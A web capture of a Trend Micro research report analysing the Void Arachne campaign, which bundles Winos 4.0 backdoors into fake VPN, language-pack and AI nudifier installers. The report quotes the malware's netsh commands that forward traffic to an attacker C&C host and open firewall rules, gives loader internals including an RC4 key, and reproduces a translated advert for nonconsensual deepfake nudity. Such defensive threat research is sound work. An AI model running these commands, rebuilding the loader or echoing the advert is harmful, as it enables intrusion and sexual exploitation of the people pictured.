www.trendmicro.com
Open in
urlscan Pro
2.17.188.219
Public Scan
URL:
https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html
Submission: On June 20 via api from TR — Scanned from DE
Submission: On June 20 via api from TR — Scanned from DE
Form analysis 1 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" class="gsc-input-field" name="search" title="search" placeholder="Search" autocomplete="off" aria-label="search">
</td>
</tr>
</tbody>
</table>
</div>
</form>Text Content
Business
search close
* Solutions
* By Challenge
* By Challenge
* By Challenge
Learn more
* Understand, Prioritize & Mitigate Risks
* Understand, Prioritize & Mitigate Risks
Improve your risk posture with attack surface management
Learn more
* Protect Cloud-Native Apps
* Protect Cloud-Native Apps
Security that enables business outcomes
Learn more
* Protect Your Hybrid World
* Protect Your Hybrid, Multi-Cloud World
Gain visibility and meet business needs with security
Learn more
* Securing Your Borderless Workforce
* Securing Your Borderless Workforce
Connect with confidence from anywhere, on any device
Learn more
* Eliminate Network Blind Spots
* Eliminate Network Blind Spots
Secure users and key operations throughout your environment
Learn more
* See More. Respond Faster.
* See More. Respond Faster.
Move faster than your adversaries with powerful purpose-built XDR,
attack surface risk management, and zero trust capabilities
Learn more
* Extend Your Team
* Extend Your Team. Respond to Threats Agilely
Maximize effectiveness with proactive risk reduction and managed
services
Learn more
* Operationalizing Zero Trust
* Operationalizing Zero Trust
Understand your attack surface, assess your risk in real time, and
adjust policies across network, workloads, and devices from a single
console
Learn more
* By Role
* By Role
* By Role
Learn more
* CISO
* CISO
Drive business value with measurable cybersecurity outcomes
Learn more
* SOC Manager
* SOC Manager
See more, act faster
Learn more
* Infrastructure Manager
* Infrastructure Manager
Evolve your security to mitigate threats quickly and effectively
Learn more
* Cloud Builder and Developer
* Cloud Builder and Developer
Ensure code runs only as intended
Learn more
* Cloud Security Ops
* Cloud Security Ops
Gain visibility and control with security designed for cloud
environments
Learn more
* By Industry
* By Industry
* By Industry
Learn more
* Healthcare
* Healthcare
Protect patient data, devices, and networks while meeting regulations
Learn more
* Manufacturing
* Manufacturing
Protecting your factory environments – from traditional devices to
state-of-the-art infrastructures
Learn more
* Oil & Gas
* Oil & Gas
ICS/OT Security for the oil and gas utility industry
Learn more
* Electric Utility
* Electric Utility
ICS/OT Security for the electric utility
Learn more
* Federal
* Federal
Learn more
* Automotive
* Automotive
Learn more
* 5G Networks
* 5G Networks
Learn more
* Small & Midsized Business Security
* Small & Midsized Business Security
Stop threats with comprehensive, set-it-and-forget-it protection
Learn more
* Platform
* Vision One Platform
* Vision One Platform
* Trend Vision One
Our Unified Platform
Bridge threat protection and cyber risk management
Learn more
* AI Companion
* Trend Vision One Companion
Your generative AI cybersecurity assistant
Learn more
* Attack Surface Management
* Attack Surface Management
Stop breaches before they happen
Learn more
* XDR (Extended Detection & Response)
* XDR (Extended Detection & Response)
Stop adversaries faster with a broader perspective and better context to
hunt, detect, investigate, and respond to threats from a single platform
Learn more
* Cloud Security
* Cloud Security
* Trend Vision One™
Cloud Security Overview
The most trusted cloud security platform for developers, security
teams, and businesses
Learn more
* Attack Surface Risk Management for Cloud
* Attack Surface Risk Management for Cloud
Cloud asset discovery, vulnerability prioritization, Cloud Security
Posture Management, and Attack Surface Management all in one
Learn more
* XDR for Cloud
* XDR for Cloud
Extend visibility to the cloud and streamline SOC investigations
Learn more
* Workload Security
* Workload Security
Secure your data center, cloud, and containers without compromising
performance by leveraging a cloud security platform with CNAPP
capabilities
Learn more
* Container Security
* Container Security
Simplify security for your cloud-native applications with advanced
container image scanning, policy-based admission control, and container
runtime protection
Learn more
* File Security
* File Security
Protect application workflow and cloud storage against advanced threats
Learn more
* Endpoint Security
* Endpoint Security
* Endpoint Security Overview
Defend the endpoint through every stage of an attack
Learn more
* XDR for Endpoint
* XDR for Endpoint
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Workload Security
* Workload Security
Optimized prevention, detection, and response for endpoints, servers,
and cloud workloads
Learn more
* Industrial Endpoint Security
* Industrial Endpoint Security
Learn more
* Mobile Security
* Mobile Security
On-premises and cloud protection against malware, malicious
applications, and other mobile threats
Learn more
* Network Security
* Network Security
* Network Security Overview
Expand the power of XDR with network detection and response
Learn more
* XDR for Network
* XDR for Network
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Network Intrusion Prevention (IPS)
* Network Intrusion Prevention (IPS)
Protect against known, unknown, and undisclosed vulnerabilities in your
network
Learn more
* Breach Detection System (BDS)
* Breach Detection System (BDS)
Detect and respond to targeted attacks moving inbound, outbound, and
laterally
Learn more
* Secure Service Edge (SSE)
* Secure Service Edge (SSE)
Redefine trust and secure digital transformation with continuous risk
assessments
Learn more
* Industrial Network Security
* Industrial Network Security
Learn more
* 5G Network Security
* 5G Network Security
Learn more
* Email Security
* Email Security
* Email Security
Stop phishing, malware, ransomware, fraud, and targeted attacks from
infiltrating your enterprise
Learn more
* Email and Collaboration Security
* Trend Vision One™
Email and Collaboration Security
Stop phishing, ransomware, and targeted attacks on any email service
including Microsoft 365 and Google Workspace
Learn more
* OT Security
* OT Security
* OT Security
Learn about solutions for ICS / OT security.
Learn more
* XDR for OT
* XDR for OT
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Industrial Network Security
* Industrial Network Security
Industrial Network Security
* Industrial Endpoint Security
* Industrial Endpoint Security
Learn more
* Threat Intelligence
* Threat Intelligence
Keep ahead of the latest threats and protect your critical data with
ongoing threat prevention and analysis
Learn more
* Identity Security
* Identity Security
End-to-end identity security from identity posture management to
detection and response
Learn more
* On-Premises Data Sovereignty
* On-Premises Data Sovereignty
Prevent, detect, respond and protect without compromising data
sovereignty
Learn more
* All Products, Services, and Trials
* All Products, Services, and Trials
Learn more
* Research
* Research
* Research
* Research
Learn more
* Research, News, and Perspectives
* Research, News, and Perspectives
Learn more
* Research and Analysis
* Research and Analysis
Learn more
* Security News
* Security News
Learn more
* Zero Day Initiatives (ZDI)
* Zero Day Initiatives (ZDI)
Learn more
* Services
* Our Services
* Our Services
* Our Services
Learn more
* Service Packages
* Service Packages
Augment security teams with 24/7/365 managed detection, response, and
support
Learn more
* Managed XDR
* Managed XDR
Augment threat detection with expertly managed detection and response
(MDR) for email, endpoints, servers, cloud workloads, and networks
Learn more
* Incident Response
* Incident Response
* Incident Response
Our trusted experts are on call whether you're experiencing a breach
or looking to proactively improve your IR plans
Learn more
* Insurance Carriers and Law Firms
* Insurance Carriers and Law Firms
Stop breaches with the best response and detection technology on the
market and reduce clients’ downtime and claim costs
Learn more
* Support Services
* Support Services
Learn more
* Partners
* Partner Program
* Partner Program
* Partner Program Overview
Grow your business and protect your customers with the best-in-class
complete, multilayered security
Learn more
* Managed Security Service Provider
* Managed Security Service Provider
Deliver modern security operations services with our industry-leading
XDR
Learn more
* Managed Service Provider
* Managed Service Provider
Partner with a leading expert in cybersecurity, leverage proven
solutions designed for MSPs
Learn more
* Cloud Service Provider
* Cloud Service Provider
Add market-leading security to your cloud service offerings – no matter
which platform you use
Learn more
* Professional Services
* Professional Services
Increase revenue with industry-leading security
Learn more
* Resellers
* Resellers
Discover the possibilities
Learn more
* Marketplace
* Marketplace
Learn more
* System Integrators
* System Integrators
Learn more
* Alliance Partners
* Alliance Partners
* Alliance Overview
We work with the best to help you optimize performance and value
Learn more
* Technology Alliance Partners
* Technology Alliance Partners
Learn more
* Our Alliance Partners
* Our Alliance Partners
Learn more
* Partner Tools
* Partner Tools
* Partner Tools
Learn more
* Partner Login
* Partner Login
Login
* Education and Certification
* Education and Certification
Learn more
* Partner Successes
* Partner Successes
Learn more
* Distributors
* Distributors
Learn more
* Find a Partner
* Find a Partner
Learn more
* Company
* Why Trend Micro
* Why Trend Micro
* Why Trend Micro
Learn more
* Customer Success Stories
* Customer Success Stories
Learn more
* The Human Connection
* The Human Connection
Learn more
* Industry Accolades
* Industry Accolades
Learn more
* Strategic Alliances
* Strategic Alliances
Learn more
* Compare Trend Micro
* Compare Trend Micro
* Compare Trend Micro
See how Trend outperforms the competition
Let's go
* vs. Crowdstrike
* Trend Micro vs. Crowdstrike
Crowdstrike provides effective cybersecurity through its cloud-native
platform, but its pricing may stretch budgets, especially for
organizations seeking cost-effective scalability through a true single
platform
Let's go
* vs. Microsoft
* Trend Micro vs. Microsoft
Microsoft offers a foundational layer of protection, yet it often
requires supplemental solutions to fully address customers' security
problems
Let's go
* vs. Palo Alto Networks
* Trend Micro vs. Palo Alto Networks
Palo Alto Networks delivers advanced cybersecurity solutions, but
navigating its comprehensive suite can be complex and unlocking all
capabilities requires significant investment
Let's go
* About Us
* About Us
* About Us
Learn more
* Trust Center
* Trust Center
Learn more
* History
* History
Learn more
* Diversity, Equity and Inclusion
* Diversity, Equity and Inclusion
Learn more
* Corporate Social Responsibility
* Corporate Social Responsibility
Learn more
* Leadership
* Leadership
Learn more
* Security Experts
* Security Experts
Learn more
* Internet Safety and Cybersecurity Education
* Internet Safety and Cybersecurity Education
Learn more
* Legal
* Legal
Learn more
* Investors
* Investors
Learn more
* Formula E Racing
* Formula E Racing
Learn more
* Connect With Us
* Connect With Us
* Connect With Us
Learn more
* Newsroom
* Newsroom
Learn more
* Events
* Events
Learn more
* Careers
* Careers
Learn more
* Webinars
* Webinars
Learn more
Back
Back
Back
Back
* Free Trials
* Contact Us
Looking for home solutions?
Under Attack?
3 Alerts
Back
Unread
All
* Ransomware in Q1 2024: Report on Phobos, LockBit, and other critical threats
close
Read report >
* Deepfakes and AI-driven disinformation threaten polls
close
Get the facts >
* Report on the email threat landscape
close
Learn the latest defense strategies >
Folio (0)
Support
* Business Support Portal
* Business Community
* Virus and Threat Help
* Education and Certification
* Contact Support
* Find a Support Partner
Resources
* Trend Micro vs. Competition
* Cyber Risk Index/Assessment
* CISO Resource Center
* DevOps Resource Center
* What Is?
* Threat Encyclopedia
* Cloud Health Assessment
* Cyber Insurance
* Glossary of Terms
* Webinars
Log In
* Vision One
* Support
* Partner Portal
* Cloud One
* Product Activation and Management
* Referral Affiliate
Back
arrow_back
search
close
Content has been added to your Folio
Go to Folio (0) close
APT & Targeted Attacks
BEHIND THE GREAT WALL: VOID ARACHNE TARGETS CHINESE-SPEAKING USERS WITH THE
WINOS 4.0 C&C FRAMEWORK
We recently discovered a new threat actor group that we dubbed Void Arachne.
This group targets Chinese-speaking users with malicious Windows Installer (MSI)
files in a recent campaign. These MSI files contain legitimate software
installer files for AI software and other popular software but are bundled with
malicious Winos payloads.
By: Peter Girnus, Aliakbar Zahravi, Ahmed Mohamed Ibrahim June 19, 2024 Read
time: 19 min (5015 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
Report highlights:
* We recently discovered a new threat actor group that we dubbed Void Arachne.
This group targets Chinese-speaking users with malicious Windows Installer
(MSI) files in a recent campaign. These MSI files contain legitimate software
installer files for AI software and other popular software but are bundled
with malicious Winos payloads.
* The campaign also promotes compromised MSI files embedded with nudifiers and
deepfake pornography-generating software, as well as AI voice and facial
technologies.
* The campaign uses SEO poisoning tactics and social media and messaging
platforms to distribute malware.
* The malware installs a Winos backdoor during the installation process, which
could lead to a full system compromise.
* Due to strict government control in China, VPN services and public interest
in this technology have notably increased. And in this Void Arachne campaign,
we’ve observed how threat actors are exploiting the heightened public
interest in software that can evade the Great Firewall and online censorship.
In early April, we discovered that a new threat actor group (which we call Void
Arachne) was targeting Chinese-speaking users. Void Arachne’s campaign involves
the use of malicious MSI files that contain legitimate software installer files
for artificial intelligence (AI) software as well as other popular software. The
malicious Winos payloads are bundled alongside nudifiers and deepfake
pornography-generating AI software, voice-and-face-swapping AI software, zh-CN
(Simplified Chinese) language packs, the simplified Chinese version of Google
Chrome, and Chinese-marketed virtual private networks (VPNs), such as LetsVPN
and QuickVPN. During the process of installation, a Winos backdoor is also
installed, which could also lead to full system compromise.
During this campaign, we observed numerous malicious installer files being
shared across several Telegram channels. We also saw attacker-controlled web
servers that distribute malicious files through search engine optimization (SEO)
poisoning attacks. These MSI files act as backdoored installers, serving both
the non-malicious software and the Winos 4.0 command-and-control (C&C) framework
implant, which could lead to a full system compromise. Winos (not to be confused
with the Windows operating system) is a backdoor used by Chinese threat actors
with an extensive array of capabilities for remotely controlling a compromised
computer.
ATTACK DIAGRAM
We observed multiple initial access vectors that the Void Arachne threat actor
group uses to distribute malware across the web and through social media
platforms. These distribution methods include an infrastructure staged for SEO
poisoning and malicious package distribution across Chinese-language-themed
Telegram channels.
Figure 1. The Void Arachne campaign attack diagram
download
INITIAL ACCESS
We observed multiple initial access vectors that the Void Arachne threat actor
group uses to distribute malware across the web and through social media
platforms. These distribution methods include an infrastructure staged for SEO
poisoning and malicious package distribution across Chinese-language-themed
Telegram channels.
SEO POISONING (T1608.006)
For this campaign, Void Arachne set up a web infrastructure that is used for SEO
poisoning that deployed spear-phishing links (T1566.002) disguised as legitimate
software installers to lure potential victims. These links are hosted on web
servers disguised as legitimate websites so that the Void Arachne threat group
can proceed to make them rank high on search engines via SEO poisoning.
Figure 2. An attacker-controlled website that hosts a malicious payload
These links contain MSI installers for common software targeting
Chinese-speaking users such as Google Chrome, Chinese language packs for popular
software, and VPNs such as LetsVPN and 快連VPN (also known as Quick VPN or
Kuilian VPN). When these malicious MSI files or archive files are downloaded
and executed, they would bootstrap the infection process. To the victim, it
appears as if the intended software was installed. However, unbeknownst to them,
additional malware is installed that beacons back to the attacker’s C&C server.
Because MSI files are bundled software installers, threat actors can include
backdoors and additional malware within the file bundle that are executed
without the end user’s knowledge during the installation process.
In this campaign, the Void Arachne group created subdomains of the domain
webcamcn[.]xyz to act as C&C servers for the various MSI files. As the campaign
progressed, various subdomains were added to this root domain.
TARGETING VPN-RELATED TECHNOLOGIES FOR SPEARPHISHING
Internet connectivity in the People’s Republic of China is subject to strict
regulation through a combination of legislative measures and technological
controls collectively known as the Great Firewall of China. Due to strict
government control, VPN services and public interest in this technology have
notably increased. This has, in turn, enhanced threat actors' interest in
exploiting the heightened public interest in software that can evade the Great
Firewall and online censorship.
Figure 3. VPN advertising services that can “overcome” the Great Firewall of
China
We discovered that the VPN “快連VPN” is a common phishing and SEO poisoning vector
used to target Chinese-speakers and the broader East Asian community. We have
evidence of multiple distinct Chinese-speaking threat actors creating
spear-phishing links and using SEO poisoning tactics by bundling this VPN with
malware that includes Gh0st RAT and its variants.
SPEARPHISHING THROUGH TELEGRAM
We observed several Telegram channels, some of which had tens of thousands of
Chinese-speaking users, advertising malicious archives and MSI files as an
additional distribution method. The malicious packages are in what appear to be
Simplified Chinese language packs for Telegram as well as various AI tools.
VPN-RELATED TELEGRAM CHANNELS
Like what’s being promoted in Void Arachne’s SEO poisoning campaign, we also
observed the same malicious MSI files being shared in Chinese language-centric
Telegram Channels. These channels are all related to VPN technology and the
malicious MSI files were shared across several Telegram channels.
Figure 4. A pinned Telegram message containing a malicious MSI file embedded in
a zip file
This is like other campaigns we’ve observed wherein after threat actors conduct
SEO-poisoning tactics, they then share links to these malicious sites or upload
related files on social media and messaging applications.
MALICIOUS SIMPLIFIED CHINESE LANGUAGE PACKS FOR TELEGRAM
A common malicious software package we observed is what appears to be a Telegram
language pack for the Simplified Chinese language. (Telegram does offer a
translation of its app in Simple Chinese, which may be found here.)
Figure 5. A malicious MSI file masquerading as a Simplified Chinese language
pack for Telegram
Using infected language packs as an infection vector is an interesting method,
especially for the Chinese language, which has an estimated 1.3 billion native
speakers. Some applications require language packs for a more localized user
experience in regional markets, leaving these users potentially vulnerable to
this kind of attack.
NUDIFIER AI TECHNOLOGIES PROMOTED ON TELEGRAM CHANNELS
A concerning trend we have recently observed is the mass proliferation of
nudifier applications that abuse AI to create AI-generated nonconsensual
deepfake pornography. These images and videos are often used in sextortion
schemes for further abuse, victim harassment, and financial gain.
Figure 6. A deepfake pornographic video sample shared on the threat actor’s
Telegram channel
Figure 6 shows a screenshot of a video on the Void Arachne Telegram channel
where a photo of a woman was used to generate a deepfake pornographic video of
using AI technology.
Figure 7. An infected nudifier application shared on the Void Arachne Telegram
channel
We’ve observed that the threat actors pinned the malicious MSI file to the top
of their Telegram channels to increase the chances of infecting users who are
interested in using this type of technology.
Figure 8. A pinned message on Void Arachne’s Telegram channel featuring a
malicious MSI file for an AI-powered app
The malicious installer files are advertised on social media and Telegram
channels and are intended to lure unsuspecting victims, potentially even minors.
Based on an initial Simplified Chinese to English translation of their
advertisement via Google Translate, the malicious actors are also targeting
young individuals who are still in school with their use of the phrase “female
classmate.”
Just have appropriate entertainment and satisfy your own lustful desires. Do not
send it to the other party or harass the other party. Once you call the police,
you will be in constant trouble! AI takes off clothes, you give me photos and I
will make pictures for you. Do you want to see the female classmate you yearn
for, the female colleague you have a crush on, the relatives and friends you eat
and live with at home? Do you want to see them naked? Now you can realize your
dream, you can see them naked and lustful for a pack of cigarette money.
A Simplified Chinese to English translation of an advertisement that promotes
nudifiers or deepfake pornography-generating software on the threat actor’s
Telegram channel
Void Arachne also advertised AI technologies that could be used for virtual
kidnapping, which is a novel deception campaign that uses misinformation through
AI voice-alternating technology to pressure victims into paying ransom.
VOICE-ALTERING AND FACE-SWAPPING AI TECHNOLOGIES PROMOTED ON TELEGRAM
In addition to fake nudifier applications, we saw additional channels
advertising face-swapping and voice-changing software. Like the rise of
nudifiers and deepfake-generating applications, we have also observed the rise
of AI-powered apps that have face-swapping and voice-altering capabilities.
Figure 9. A screenshot of the Void Arachne Telegram channel advertising
face-swapping applications
We’ve found that malicious MSI files were shared and pinned on various AI video
and voice manipulation Telegram channels.
Figure 10 shows a screen capture of a threat actor video posted on Void
Arachne’s Telegram channel wherein the malicious actor can be seen using AI
face- and voice-cloning technology on a WhatsApp call. Figure 12, on the other
hand, shows a malicious voice-altering and face-swapping AI app installer on
Telegram.
Figure 10. A screen capture of a video posted on a Telegram channel wherein the
threat actor uses AI face- and voice-cloning technology on a WhatsApp call
Figure 11. An infected voice-changing and face-swapping AI app installer on
Telegram
TECHNICAL ANALYSIS
LETVPN MSI ANALYSIS
Name Letvpn.msi SHA256
fae4f96beda54a1ed4914537b0542182d3a020dd9db9d9995df37d303b88e6df Size 27.05 MB
Type Windows Installer
This section discusses our analysis of the malicious files associated with Void
Arachne’s campaign, starting with the letvpn.msi file.
The malicious MSI file uses Dynamic Link Libraries (DLLs) during the
installation process. These DLLs play a pivotal role during runtime,
facilitating various essential operations including property management within
MSI packages, scheduling tasks, and configuring firewall rules.
Figure 12. MSI binary table that shows embedded DLLs
Figure 13. MSI action table
The MSI file performs several tasks, such as creating scheduled tasks and
configuring firewall parameters. Specifically, we have observed the creation and
configuration of firewall rules via the OnFwConfig and OnFwInstall functions
from NetFirewall.dll, which are designed to whitelist both inbound and outbound
traffic associated with the malware for the public network profile only.
Figure 14. Firewall rule addition
Figure 15. Firewall rule creation
Figure 16 shows the configuration of the inbound firewall rule created to enable
unrestricted access for the malware when connected to public networks, ensuring
that the malware can operate without interruption.
Figure 16. Inbound firewall rule configuration
Furthermore, letvpn.msi drops multiple hidden files, including the LetsPro.exe
loader, within the designated directory path C:\Program Files (x86)\Common
Files\Microsoft Shared\. Subsequently, it initiates the execution of the LetsPRO
loader.
File name Size MD5 hash Parent directory 1 9996288
D82362C15DDB7206010B8FCEC7F611C5 C:\Program Files (x86)\Common Files\Microsoft
Shared\VGX\app-3.4.0 LetsPRO.exe (Loader) 40960
FE7AEDAB70A5A58EFB84E6CB988D67A4 C:\Program Files (x86)\Common Files\Microsoft
Shared\VGX\app-3.4.0 LetsPRO.exe 247272 7BB188DFEE179CBDE884A0E7D127B074
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX
Table 1. Sample of files dropped by LetsPro.msi
TROJAN LOADER LETSPRO.EXE ANALYSIS
Name LetsPRO.exe SHA256
768881a43d2ffd9701bf2e241a1d59d8a0c116cf20e27a632a8b087bb81de409 Compilation
time 2024-02-03 3:59:52 a.m. Size 40.00 KB Compiler Microsoft Visual C/C++ (2003
v.7.1 (3052-9782)) [EXE32] Type EXE
LetsPro.exe is a trojan loader that decrypts, maps, and executes a second-stage
payload in memory. The loader first reads and loads the content of a file named
“1”, with the following content structure:
struct payload_struct {
uint32_t flag; // 1 if the data is encrypted, 0 if it's plaintext/Memory
clean up
uint32_t fileSize; // Size of the encrypted data in bytes
char encryptedData[]; // The encrypted payload
};
Figure 17. File 1 content structure
It then identifies the encrypted data section within the file. The initial part
of the file structure contains a flag set to 1, which indicates encryption. The
loader uses the Rivest Cipher 4 (RC4) algorithm with the key "0x678E0B00" to
decrypt this data. After decryption, the payload, which is now executable code,
is mapped into the process's memory space and executed.
The decryption key structure is defined as follows:
struct decryption_key_struct {
uint32_t memory_cleanup; // Flag for memory cleanup after decryption
uint32_t keySize; // Size of the decryption key
char key[]; // Decryption key
};
The following code snippet demonstrates the core part of the loader logic:
Figure 18. LetsPro.exe core logic
The following snippet demonstrates the decrypted file 1 structure in memory:
Figure 19. File 1 decrypted content structure in memory
SECOND-STAGE LOADER ANALYSIS
SHA256 77c77e728b98a923bb057943d0b5765b79106c0378d72814cb3db69749abaebb Size
15.77 MB Compilation time 2024-05-11 08:02:23 Type DLL
After the second-stage loader (file “1”) is executed and loaded into memory, the
malware drops a Visual Basic Script (VBScript) designed to automate the creation
of a scheduled task within Windows Task Scheduler to achieve persistence. The
VBScript file will create a new scheduled task and configure task settings to
run when a user is logged on to execute a specified batch file. Additionally,
the malware creates a Windows service that starts with CreateSvc_ to execute the
VBScript file. At the time of research, the batch file was not available.
Figure 20. VBScript sets up a scheduled task and configures properties
Figure 21. VBScript adds an action to the scheduled task to execute a BAT file
Figure 22. Scheduled task for executing the BAT file
Figure 23. Service creation for VBScript execution
After that, the malware replicates the loader, VBScript, and the file “1” within
the user directory.
File name Size MD5 Parent directory 1 9996288
D82362C15DDB7206010B8FCEC7F611C5 C:\Users\%USERNAME%\<Random Directory Name>
792258.vbs 2405 CD95B5408531DC5342180A1BECE74757 C:\Users\%USERNAME%\<Random
Directory Name> LetsPRO.exe 40960 FE7AEDAB70A5A58EFB84E6CB988D67A4
C:\Users\%USERNAME%\<Random Directory Name>
Table 2. Sample of files dropped by 1
The malware also uses the netsh command to set up port forwarding and configure
firewall rules named “Safe<integer>” on the victim’s machine, thereby
whitelisting inbound and outbound traffic related to the malware for all network
profiles.
It establishes a rule for IPv4-to-IPv4 port forwarding. Specifically, it
designates port 443 as the listening port on the local machine, where incoming
connections will be received. It specifies a destination address
(103.214.147.14[.]webcamcn[.]xyz), indicating where the forwarded traffic will
be directed. Additionally, it designates port 443 on the destination server as
the port to which the incoming traffic will be forwarded. This configuration
redirects traffic from the local machine's port 443 to the specified destination
address and port.
netsh interface portproxy add v4tov4 listenport=443
connectaddress=103[.]214[.]147[.]14[.]webcamcn[.]xyz connectport=443
Figure 24. Configuring port forwarding
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
Figure 25. Configuring firewall rule
Figure 26. List of created firewall rules
Finally, the malware passes the execution to the Winos 4.0 stager in memory.
WINOS 4.0 C&C FRAMEWORK OVERVIEW
The final payload of this attack is the Winos 4.0 implant, which is written in
C++ and targets the Windows platform. Winos has features that include file
management, distributed denial of service (DDoS) using TCP/UDP/ ICMP/HTTP, full
disk search, webcam control, and screen capturing. Additionally, it supports
many functionalities including process injection and microphone recording,
system and service management, remote shell access, and keylogging
functionalities, further enhancing its ability to control and monitor the
infected system.
Figure 27. Winos 4.0 operator panel
The Winos C&C server is equipped with 23 internal plugins, each compiled in both
32- and 64-bit versions, to execute a variety of tasks. Table 3 shows the
complete list of these plugins, along with their respective SHA256 hashes:
Simplified Chinese module names Translated module names SHA256 hash 播放监听.dll
Play monitor.dll
7ed8c7ea5e2feeadb1966f53c48ab3a580f53a4d20725031d764db7e962607a9 查注册表.dll check
registry.dll 49120dfcef430df1c90c9c370b92b969c876b9b4327d81eae720cd71fcd75b87
差异屏幕.dll difference screen.dll
5f7e00017b16db29fa7cba60993d7af909ef41d3fe9d3f7ca9f693c1f7ef6d37 代理映射.dll proxy
mapping.dll 023822a8ad26f2d7330a2afa310ccf943058f2765b7cbc6975c51c144739b55f
服务管理.dll service management.dll
3ac0afec0ce29b69d57c54663c6e4fa6fee703696069cb5b8f00783b5504cf80 高速屏幕.dll
high-speed screen.dll
bc01cf528086de6a1b231dee01c1624cf58911b171904bf7a6b08ddfba661d83 后台屏幕.dll
Background Screen.dll
2066dd040fe020ca32e5ebfeeb4fa75094d3ac43155c83fe222f380d4940df42 急速搜索.dll Rapid
Search.dll 5759fc938f228579fc5e64e74cee083581a975d4054deb715c0f371b66b96263
键盘记录.dll Keylogger.dll
976837663b25f793470f24925198b06e79a72ede014a84ba62311fadede5062f 上线模块.exe
(stager) Online Module.dll
436499efe94c7a1bfefaa84c52f8187bffb3d4d1a49de1cbc8885e7807d11b42 上线模块.dll
(stager) Online Module.dll
5684fc4f33c168519b2fdcae59cc3be2e6db1f0b0f3718524ef57e0e7423f59d 视频查看.dll Video
Viewing.dll 7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af
视频查看.dll Video Surveillance.dll
7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af 文件管理.dll File
Management.dll 5abc2006c7a3a27e033075ba881a668aba5e70797677ed2220f7ab9fb36fc927
系统管理.dll System Management.dll
827ed4f36ea7032395bfa35da54c6e9d06d6633aa7396792e8511adf366c1fcc 远程交谈.dll Remote
Communication.dll
c61c8ded2a9481c2e50b4872c8f7bcd8ecc33997a6004e62aa06b60742f54e57 远程终端.dll Remote
Terminal.dll 409e09ac0fcf7d39044ef0b3eb798aea6dc0650e5214056760694c1340fc8488
注入管理.dll Injection management.dll
ecf5394d78392b11daec1016c6b447f9da7eae69f7702ecf8c4d1d3f69e3fe64 娱乐屏幕.dll
Entertainment Screen.dll
6ce947e21128687ed37f247e297f29609251deed934b7b5722d27f4a1f72a90e 压力测试.dll (DDOS
module) Stress Test.dll
61d73a8920c41483d0832c9a5c5bc9f57ac5f71146a98faefc0cb4d988e77bab 计划任务.dll
Scheduled Tasks.dll
4791c23aff8a09061b76a05bb88ee37149995584a87aade236ea4eebab79ed1c 登录模块.dll
LoginModule.dll 16d3c176ca94c84b60e26981231bf59ebe75057ac10dd6f583ce65a3bed11dd0
(shellcode) - b022e0f0b2ae9e27847cfc909bfcdbc89a732fcdde6e473443aaab2592a84910
Table 3. Winos 4.0 internal plugins
Similar to Cobalt Strike and Sliver, Winos supports custom plugins that can be
developed by a threat actor. This allows the tool to extend its capabilities and
add custom functionality. During our investigation, we found the following
external and custom plugins for Winos 4.0 in the wild:
Plugin name in Chinese Plugin name in English SHA256 hash 删除360急速安全账号密码.dll
Delete 360 Speed Security Account Password.dll
03669424bdf8241a7ef7f8982cc3d0cf56280a5804f042961f3c6a111252ffd3
提权-EnableDebugPrivilege.dll Elevate Privileges-EnableDebugPrivilege.dll
11a96c107b8d4254722a35ab9a4d25974819de1ce8aa212e12cae39354929d5f 体积膨胀.dll Volume
Expansion.dll 186bf42bf48dc74ef12e369ca533422ce30a85791b6732016de079192f4aac5f
提权ShellExecuteEx.dll Elevate Privileges-ShellExecuteEx.dll
202c378deb628a8104a1dd957bbd70b945beea8e11d55b9ce3e4787fbe496797 删除sogou账号密码.dll
Delete Sogou Account Password.dll
2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b459a
提权-RtlAdjustPrivilege.dll Elevate Privileges-RtlAdjustPrivilege.dll
47dfa891fc347187ba4ac161980a7e7c47cf656ddbf7b269a74c32a5a1365d4e 删除ie账号密码.dll
Delete IE Account Password.dll
538382dc7a7839f125ffe08a854512b78fc4a657697227e53f832ae566ca2505
提权-CreateProcessInSession0.dll Elevate Privileges-CreateProcessInSession0.dll
616c7270a21ecc9ccd880e04563343e9ac53cce88a77244388dbb1fc7bfa4360 写启动目录.dll Write
to Startup Directory.dll
61981a0324586ad83e6cb7015df91a6e4887537ad36a4674be82cb3cfcf5b18b 写注册表启动.dll
Write to Registry Startup.dll
d2e15264c786917a6cb194bf0cf586a69b8678c6d4d4c87cc14082d7b76fe0b2 删除自身.dll Delete
Itself.dll 6ece1e12d50ade02bf424007a9b70b4a14580244a9a1f5cd32c0a129ec069d6e
内网主机扫描.dll Internal Network Host Scan.dll
6f5574d00ffce206525835f72ac083692a183e69114f1551b7ecb99dec3d1d19 解密数据.dll
Decrypt Data.dll
6f923b94a614e61cbde73c5b09036b9482f3770c02161ecb0875dbb56bc65843
删除chrome账号密码.dll Delete Chrome Account Password.dll
fbc23b84b2c83e99ab1c5cb7075bd5d26b55dde4afc06eddc0471c6d6b2cc5f2 写计划任务.dll Write
Scheduled Task.dll
65ac9f036b1d8a02e4c9041eeafc230562088e57f2535bd194e8bf592e62cb06
删除telegram账号密码.dll Delete Telegram Account Password.dll
2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b459a 删除qq账号密码.dll
Delete QQ Account Password.dll
b71e6c4ff7c910dd666f442e98597f90bd2eb3fce4c8889af0ecc694f282bf64 删除skype账号密码.dll
Delete Skype Account Password.dll
b396bfd7bec043cf402e04fa810983c93c79d1a632fd4558098e68eb144abb17
Table 4. Winos 4.0 external plugins
WINOS 4.0 STAGER ANALYSIS
File name 上线模块.dll (Online Module.dll) Magic PE32 executable (DLL) SHA256
